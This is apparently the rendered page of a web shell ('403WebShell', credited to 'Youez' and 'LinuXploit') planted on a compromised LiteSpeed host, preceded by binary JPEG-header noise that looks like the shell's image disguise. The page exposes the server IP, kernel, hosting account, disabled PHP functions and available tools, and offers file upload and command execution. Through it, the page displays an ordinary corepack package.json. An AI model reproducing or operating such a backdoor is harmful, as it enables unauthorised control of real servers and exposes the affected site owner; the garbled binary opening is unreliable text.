JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 153.92.12.184  /  Your IP : 216.73.217.6
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/alt/alt-nodejs24/root/usr/lib/node_modules/corepack/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/alt/alt-nodejs24/root/usr/lib/node_modules/corepack//package.json
{
  "name": "corepack",
  "version": "0.34.0",
  "homepage": "https://github.com/nodejs/corepack#readme",
  "bugs": {
    "url": "https://github.com/nodejs/corepack/issues"
  },
  "repository": {
    "type": "git",
    "url": "https://github.com/nodejs/corepack.git"
  },
  "engines": {
    "node": "^20.10.0 || ^22.11.0 || >=24.0.0"
  },
  "exports": {
    "./package.json": "./package.json"
  },
  "license": "MIT",
  "packageManager": "yarn@4.9.0+sha224.dce6c5df199861784bd9b0eecb2a228df97e3f18a02b1bb75ff98383",
  "devDependencies": {
    "@types/debug": "^4.1.5",
    "@types/node": "^20.4.6",
    "@types/proxy-from-env": "^1",
    "@types/semver": "^7.1.0",
    "@types/which": "^3.0.0",
    "@yarnpkg/eslint-config": "^3.0.0",
    "@yarnpkg/fslib": "^3.0.0-rc.48",
    "@zkochan/cmd-shim": "^6.0.0",
    "better-sqlite3": "^11.7.2",
    "clipanion": "patch:clipanion@npm%3A3.2.1#~/.yarn/patches/clipanion-npm-3.2.1-fc9187f56c.patch",
    "debug": "^4.1.1",
    "esbuild": "^0.25.0",
    "eslint": "^9.22.0",
    "proxy-from-env": "^1.1.0",
    "semver": "^7.6.3",
    "supports-color": "^10.0.0",
    "tar": "^7.4.0",
    "tsx": "^4.16.2",
    "typescript": "^5.7.3",
    "undici": "^6.19.2",
    "v8-compile-cache": "^2.3.0",
    "vitest": "^3.0.5",
    "which": "^5.0.0"
  },
  "resolutions": {
    "undici-types": "6.x"
  },
  "scripts": {
    "build": "run clean && run build:bundle && tsx ./mkshims.ts",
    "build:bundle": "esbuild ./sources/_lib.ts --bundle --platform=node --target=node18.17.0 --external:corepack --outfile='./dist/lib/corepack.cjs' --resolve-extensions='.ts,.mjs,.js'",
    "clean": "run rimraf dist shims",
    "corepack": "tsx ./sources/_cli.ts",
    "lint": "eslint .",
    "prepack": "yarn build",
    "postpack": "run clean",
    "rimraf": "node -e 'for(let i=2;i<process.argv.length;i++)fs.rmSync(process.argv[i],{recursive:true,force:true});'",
    "typecheck": "tsc --noEmit",
    "test": "vitest"
  },
  "files": [
    "dist",
    "shims",
    "LICENSE.md"
  ],
  "publishConfig": {
    "bin": {
      "corepack": "./dist/corepack.js",
      "pnpm": "./dist/pnpm.js",
      "pnpx": "./dist/pnpx.js",
      "yarn": "./dist/yarn.js",
      "yarnpkg": "./dist/yarnpkg.js"
    },
    "executableFiles": [
      "./dist/npm.js",
      "./dist/npx.js",
      "./dist/pnpm.js",
      "./dist/pnpx.js",
      "./dist/yarn.js",
      "./dist/yarnpkg.js",
      "./dist/corepack.js",
      "./shims/npm",
      "./shims/npm.ps1",
      "./shims/npx",
      "./shims/npx.ps1",
      "./shims/pnpm",
      "./shims/pnpm.ps1",
      "./shims/pnpx",
      "./shims/pnpx.ps1",
      "./shims/yarn",
      "./shims/yarn.ps1",
      "./shims/yarnpkg",
      "./shims/yarnpkg.ps1"
    ]
  },
  "bin": {
    "corepack": "./dist/corepack.js",
    "pnpm": "./dist/pnpm.js",
    "pnpx": "./dist/pnpx.js",
    "yarn": "./dist/yarn.js",
    "yarnpkg": "./dist/yarnpkg.js"
  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit